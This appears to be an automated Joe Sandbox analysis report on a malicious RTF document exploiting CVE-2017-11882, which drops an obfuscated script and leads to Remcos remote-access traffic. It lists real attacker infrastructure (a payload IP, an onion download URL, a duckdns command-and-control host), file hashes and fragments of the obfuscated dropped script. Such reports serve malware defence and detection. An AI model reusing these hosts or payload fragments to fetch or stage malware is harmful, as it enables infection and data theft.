                  https://contextual.media.net/8/nrrV73987.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.378441374.00000000008C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contextual.media.net/bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://archive.orgpowershell.exe, 00000007.00000002.364796787.000000000259A000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.msn.com/bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFjEQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_impowershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://85.239.241.184powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cdn.at.atwola.com/_media/uac/msn.htmlbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://go.microsoft.cpowershell.exe, 00000007.00000002.364637845.00000000002FA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/accounts/serviceloginRegAsm.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://policies.yahoo.com/w3c/p3p.xmlbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.msn.com/advertisement.ad.jsbhv5928.tmp.11.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.224.2 | archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
45.89.247.65 | dremom2.duckdns.org | United Kingdom | 33657 | CMCSUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
85.239.241.184 | unknown | Czech Republic | 15685 | CASABLANCA-ASInternetCollocationProviderCZ | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1505518
                  Start date and time:2024-09-06 11:25:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                  Detection:MAL
                  Classification:mal100.phis.troj.spyw.expl.evad.winRTF@19/18@5/4
                  EGA Information:
                  • Successful, ratio: 71.4%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 168
                  • Number of non-executed functions: 328
                  Cookbook Comments:
                  • Found application associated with file extension: .rtf
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Override analysis time to 79674.7731553256 for current running targets taking high CPU consumption
                  • Override analysis time to 159349.546310651 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3616 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 3800 because it is empty
• Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:25:55 | API Interceptor | 283x Sleep call for process: EQNEDT32.EXE modified
05:25:57 | API Interceptor | 10x Sleep call for process: wscript.exe modified
05:25:58 | API Interceptor | 76x Sleep call for process: powershell.exe modified
05:26:04 | API Interceptor | 6203199x Sleep call for process: RegAsm.exe modified
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4760
                          Entropy (8bit):4.834060479684549
                          Encrypted:false
                          SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                          MD5:838C1F472806CF4BA2A9EC49C27C2847
                          SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                          SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                          SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):195600
                          Entropy (8bit):3.8644523012696523
                          Encrypted:false
                          SSDEEP:3072:LBbdxVpFzbQKUxc63rKxN+vHYnL33gt5pIGwf5pyb0la1T0H7s9LqkzsX0T:VbjVpFzbQKmbGKvHW3aWElsI
                          MD5:99B11BAD85FE65119B8ABDA67E671E46
                          SHA1:3C41D084CA96CB9EEE5F2813C4C7AFEC43733B40
                          SHA-256:6F1DE9C391202040823D62D2CE5FFB5BEA5D629E75F923F4796D1452E6E392D2
                          SHA-512:DF1B8F41A1CFC21E6008652ED1BF740CA25ADA553DDB2332FA4A7E7CA268F6696581FAB7127E9C89AD641792AE79D88B5291093DD9FAB87D17F5FCF73F07B189
                          Malicious:false
                          Preview:......W.U.Z.W.u.Q.P.W.I.B.e.c. .=. .".m.j.l.k.Z.L.O.o.r.l.B.z.".....k.a.q.L.L.x.W.x.L.Q.L.h. .=. .".b.c.P.k.O.H.W.z.i.L.c.W.".....c.N.G.P.k.L.m.c.Q.u.J.f. .=. .".c.H.h.h.W.A.G.L.A.k.m.v.".....j.k.g.l.T.W.e.G.i.J.K.n. .=. .".e.Z.O.L.m.p.p.T.B.L.L.L.".....K.x.W.Z.B.t.H.t.o.h.z.d. .=. .".e.i.v.u.L.a.U.j.z.L.x.s.".....i.k.h.C.W.K.c.R.I.C.W.W. .=. .".f.G.W.f.q.c.z.i.i.t.G.C.".....m.u.e.h.W.P.v.u.L.T.U.a. .=. .".f.L.L.W.B.k.K.W.K.q.t.x.".........K.L.k.v.W.W.W.S.l.z.v.d. .=. .".o.b.v.a.g.u.e.a.r.B.L.e.a.f.L.L.P.".....z.k.O.L.e.a.Z.o.b.h.R.U. .=. .".l.t.P.W.L.k.m.L.A.W.m.K.".....h.P.i.z.A.p.Z.d.U.o.d.h. .=. .".W.k.U.m.j.U.o.v.a.g.u.e.a.r.h.z.S.".....s.k.N.l.e.n.K.r.e.n.Q.x. .=. .".B.e.c.e.z.i.G.x.L.A.i.m.".....d.N.A.q.o.Z.G.L.U.P.f.z. .=. .".h.W.b.Z.h.p.p.W.l.T.u.U.".....G.a.b.W.d.q.N.h.h.m.u.Z. .=. .".t.Q.Q.K.U.x.i.W.R.I.a.L.".....m.h.t.T.U.b.o.m.W.K.t.c. .=. .".W.L.r.z.I.u.R.c.L.c.I.l.".....g.f.G.W.L.h.G.e.m.k.m.K. .=. .".C.G.f.c.W.z.A.K.p.d.m.o.".....u.o.m.R.N.k.R.K.C.q.B.o. .=. .".W.C.c.c.
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):962
                          Entropy (8bit):5.013811273052389
                          Encrypted:false
                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                          Malicious:false
                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:CE338FE6899778AACFC28414F2D9498B
                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):14848
                          Entropy (8bit):3.5953326421230978
                          Encrypted:false
                          SSDEEP:384:CGJfJF7d/PED5LZu0aK4+Cuz69ETUnU2tRCC8:CGjhED5tfai9mWTmR/8
                          MD5:596A615C786EA1C87821DEFA4ECD7DE8
                          SHA1:7B9470A00C69587210605A593CA48B72CBDC0184
                          SHA-256:A068CA43338EE8A0B1CB7C334B8118B16D738059D7D87221B893B839A5B929AF
                          SHA-512:994E0D85B5181E8BF9E3F92672AA1C3E8AC818196540555FE96E9471B96FAA2D6CFA3AF3D4FD88B55DFC98A379F6776EF264033664F298590685BC77E3405CDF
                          Malicious:false
                          Preview:....5.8.0.0.5.1.3.7.*.6.~.,.?.%.6.3.%.[.|.).;.?.4.>.?.0...?.8.2.3.%.~.].$.[.-...<./.]...$.8...|.^...,.*.#.,.,.:.1.(.~.2.9...&.(.'.4.=.%.-.?.'.(.&.:.2.>.@.>.-.:.5...^.6.&.,.<.,...!.-.9.(.).?.!.].!.+.].`.?.1...-.|.0.-.7.2.;.).-.0.@.@.....;.'._.6.,.*.).^.?.<.=.?.-.'.$.9.?.3.=...#.2.?.:.?.|.=.<.?.2.`...?...?.6.?.9.,.6.0.~.$.2.!.?.8.#.$.<.?.!.?.$.>.:.?.$.`.$.&.?.(.?.(.>.1._.=...?.;.|.,.2.).$.>.|.#.9.?.7.'.^.'._.0.2.?.5...!.]...7.;.4.;.<...:.+.6.8.=.8.<.8.,.*.~.|.%.^.).~.@._.[.;.*.].;.1.(._.&.-.>.%.5.?.|.3.0.?.-.<...3.)...-.)...,.$...].....4.#.?.'.9.&.$.?.1.3.(.?.%.@.=.!.%.5.0.].:.?.?.&.].?.:.?.?.6.2.%.#.?.....#...2.(.].%.2.8.;.?.-.~.?.6.=.$.:.<.]._.<.<.].$.?.4.5.+.^.%._.`.=.3.?.+.-.:.'.+.+...?.(.?.!.8.>.4.[.?.].*.5.?.>.).?.&.|.?.0.9.^.4.5.'.).%.=.4.^.?.1.?.7...$...1.@.2.>.^...+.?.[.6._...@...>.1...?.>...[.!.`.~.;.>.?.;.[.......*.9.?.4.!._.9.;.>.[.].<.#.@._.[.?.+.?.+.....!.6.`.(.#.(...?./.:.+.&.9.^.....^.[.5.....2...5.%.#.*.@.%.=.7.(.&.%.7.$.;.:.;.].?.[.>.3.^.%.6.].2.#...?.0.].*.$.:.,.?.;._.
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1024
                          Entropy (8bit):0.05390218305374581
                          Encrypted:false
                          SSDEEP:3:ol3lYdn:4Wn
                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x03900705, page size 32768, DirtyShutdown, Windows version 6.1
                          Category:dropped
                          Size (bytes):21037056
                          Entropy (8bit):1.1390568396758962
                          Encrypted:false
                          SSDEEP:24576:lO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:lOEXs1LuHqqEXwPW+RHA6m1fN
                          MD5:BBBD80E55FB5C003EA4B12415BBA9046
                          SHA1:98295E02E4A4C80534DB036154A1F030AEA77B84
                          SHA-256:0042402C0DD88F4CC4569F07C15768771FB8C9FF6F9670C80B49C4CD6357684C
                          SHA-512:D85A9123F1173E17DECC018E6D2215EC338F3559A4C515CF52AC3A547F9238AB1EC5403F685E91BEAEC161C72BD600A8E1182E5EFF3E7408B03304521908BA45
                          Malicious:false
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                          Category:dropped
                          Size (bytes):2
                          Entropy (8bit):1.0
                          Encrypted:false
                          SSDEEP:3:Qn:Qn
                          MD5:F3B25701FE362EC84616A93A45CE9998
                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                          Malicious:false
                          Preview:..
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Fri Sep 6 08:25:54 2024, length=103450, window=hide
                          Category:dropped
                          Size (bytes):1239
                          Entropy (8bit):4.521382520606573
                          Encrypted:false
                          SSDEEP:24:814W/XTr8bkOVHCdOyJeV+HCdOwDv3qK57u:83/XTwbvHCZ7HCIK9u
                          MD5:7853DC92267243D44BF4D42592F90D51
                          SHA1:038405F6F0037FF743D59F5690387891A626B829
                          SHA-256:03FBF8BC49FC4224F68240019968CC0EF7262914864C550221C99FE0EF4515D5
                          SHA-512:D670322E7BF1CC44ED90377E134EFC981F8CFF7C90DBC2B5712DD146D8B6FC470725EA142C8B1972E93EEC2B9773CFEFC0ECAAD3A2CFFA90F1483D869DC3A552
                          Malicious:false
                          Preview:L..................F.... ...&...r...&...r.......>...........................)....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....&Y9K..user.8......QK.X&Y9K*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....&Y<K .SECURI~1.RTF..........WD..WD.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.1.8.7...2.9.1.9.8...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf.R.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...1.2.1.8.7...2.9.1.9.8...r.t.f.........:..,.LB.)...Ag.............
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:Generic INItialization configuration [folders]
                          Category:dropped
                          Size (bytes):145
                          Entropy (8bit):4.881114782064215
                          Encrypted:false
                          SSDEEP:3:H9rbcK+JiMUXEwlm4P8bcK+JiMUXEwlv:H9rwKNVXEjwKNVXEy
                          MD5:ADC6772097ADB6808F5D3B599D71A8BE
                          SHA1:D52667E650405A7BB455EF388C94B12508E9F396
                          SHA-256:BAD7760415220145B7EC8C7E643FA215DB7E9DA3C19DD5303745188D12206D87
                          SHA-512:592261D9E04B2DC96208EA63432DCAA9199D31DA6ECE79B9F33C6EA2B0175B546CFE34C96C6F59CA1ED6F05E1CBDF0F58E5260F257D63627439829FBC7D42DC5
                          Malicious:false
                          Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK=0..
                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162
                          Entropy (8bit):2.4797606462020307
                          Encrypted:false
                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                          Malicious:false
                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):195600
                          Entropy (8bit):3.8644523012696523
                          Encrypted:false
                          SSDEEP:3072:LBbdxVpFzbQKUxc63rKxN+vHYnL33gt5pIGwf5pyb0la1T0H7s9LqkzsX0T:VbjVpFzbQKmbGKvHW3aWElsI
                          MD5:99B11BAD85FE65119B8ABDA67E671E46
                          SHA1:3C41D084CA96CB9EEE5F2813C4C7AFEC43733B40
                          SHA-256:6F1DE9C391202040823D62D2CE5FFB5BEA5D629E75F923F4796D1452E6E392D2
                          SHA-512:DF1B8F41A1CFC21E6008652ED1BF740CA25ADA553DDB2332FA4A7E7CA268F6696581FAB7127E9C89AD641792AE79D88B5291093DD9FAB87D17F5FCF73F07B189
                          Malicious:true
                          Preview:......W.U.Z.W.u.Q.P.W.I.B.e.c. .=. .".m.j.l.k.Z.L.O.o.r.l.B.z.".....k.a.q.L.L.x.W.x.L.Q.L.h. .=. .".b.c.P.k.O.H.W.z.i.L.c.W.".....c.N.G.P.k.L.m.c.Q.u.J.f. .=. .".c.H.h.h.W.A.G.L.A.k.m.v.".....j.k.g.l.T.W.e.G.i.J.K.n. .=. .".e.Z.O.L.m.p.p.T.B.L.L.L.".....K.x.W.Z.B.t.H.t.o.h.z.d. .=. .".e.i.v.u.L.a.U.j.z.L.x.s.".....i.k.h.C.W.K.c.R.I.C.W.W. .=. .".f.G.W.f.q.c.z.i.i.t.G.C.".....m.u.e.h.W.P.v.u.L.T.U.a. .=. .".f.L.L.W.B.k.K.W.K.q.t.x.".........K.L.k.v.W.W.W.S.l.z.v.d. .=. .".o.b.v.a.g.u.e.a.r.B.L.e.a.f.L.L.P.".....z.k.O.L.e.a.Z.o.b.h.R.U. .=. .".l.t.P.W.L.k.m.L.A.W.m.K.".....h.P.i.z.A.p.Z.d.U.o.d.h. .=. .".W.k.U.m.j.U.o.v.a.g.u.e.a.r.h.z.S.".....s.k.N.l.e.n.K.r.e.n.Q.x. .=. .".B.e.c.e.z.i.G.x.L.A.i.m.".....d.N.A.q.o.Z.G.L.U.P.f.z. .=. .".h.W.b.Z.h.p.p.W.l.T.u.U.".....G.a.b.W.d.q.N.h.h.m.u.Z. .=. .".t.Q.Q.K.U.x.i.W.R.I.a.L.".....m.h.t.T.U.b.o.m.W.K.t.c. .=. .".W.L.r.z.I.u.R.c.L.c.I.l.".....g.f.G.W.L.h.G.e.m.k.m.K. .=. .".C.G.f.c.W.z.A.K.p.d.m.o.".....u.o.m.R.N.k.R.K.C.q.B.o. .=. .".W.C.c.c.
                          File type:Rich Text Format data, version 1
                          Entropy (8bit):2.7048104634693875
                          TrID:
                          • Rich Text Format (5005/1) 55.56%
                          • Rich Text Format (4004/1) 44.44%
                          File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                          File size:103'450 bytes
                          MD5:124bfb183c9b3f3b757fa9559967ab95
                          SHA1:e2004e5b5803b0ab65c9b8142808f9367a9b1c8a
                          SHA256:1a7f73810fe77606fa0b04f8425407e39b2c6ba612cb287d56b7e46506781840
                          SHA512:6bac823ffbeefb8bb92a3222661e44704d8212ee0a60912db4ee2df58eafb645b328dc8dbe297377893ac66f0f1b3e2bf33aef5b876f64be411712e70c58d4b5
                          SSDEEP:768:ZuwXIcvKEVtQ6Z3aV14YziPwAS7EfLWcO:ZuwXuEVD3aV14aiPq7sLa
                          TLSH:5AA3E028C78F51A5CF556277532A8E0946FCB33EB70952B2746C933133ADD3D09A6878
                          File Content Preview:{\rtf1.....{\*\adjust10Value836040134 \[}.{\758005137*6~,?%63%[|);?4>?0.?823%~]$[-.</].$8.|^.,*#,,:1(~29.&('4=%-?'(&:2>@>-:5.^6&,<,.!-9()?!]!+]`?1.-|0-72;)-0@@..;'_6,*)^?<=?-'$9?3=.#2?:?|=<?2`.?.?6?9,60~$2!?8#$<?!?$>:?$`$&?(?(>1_=.?;|,2)$>|#9?7'^'_02?5.!]
                          Icon Hash:2764a3aaaeb7bdbf
                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                          000001BA8hno
                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                          2024-09-06T11:26:04.354590+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.224.2 | 443 | 192.168.2.22 | 49162 | TCP
                          2024-09-06T11:26:05.269595+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 85.239.241.184 | 80 | 192.168.2.22 | 49163 | TCP
                          2024-09-06T11:26:05.269595+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 85.239.241.184 | 80 | 192.168.2.22 | 49163 | TCP
                          2024-09-06T11:26:08.593962+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49164 | 45.89.247.65 | 2201 | TCP
                          2024-09-06T11:26:09.960512+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49166 | 178.237.33.50 | 80 | TCP
                          2024-09-06T11:26:10.069561+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49165 | 45.89.247.65 | 2201 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Sep 6, 2024 11:25:58.891506910 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891520023 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891534090 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.891541004 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.891560078 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.891568899 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896301985 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896323919 CEST804916185.239.241.184192.168.2.22
